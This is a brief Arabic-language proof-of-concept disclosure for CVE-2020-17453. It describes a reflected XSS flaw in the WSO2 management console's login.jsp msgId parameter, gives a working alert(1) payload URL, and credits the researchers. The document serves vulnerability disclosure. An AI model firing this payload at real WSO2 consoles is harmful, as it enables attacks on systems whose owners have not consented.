
PoC (إثبات المفهوم) - CVE-2020-17453
CVE-2020-17453
تسمح وحدة تحكم إدارة WSO2 حتى الإصدار 5.10 بحدوث هجوم XSS عبر معلمة msgId في carbon/admin/login.jsp.

https://<company>.com/carbon/admin/login.jsp?msgId=%27;alert(1)//
الاسم: Jackson Henry
تويتر: @JacksonHHax
الاسم: Nicholas Young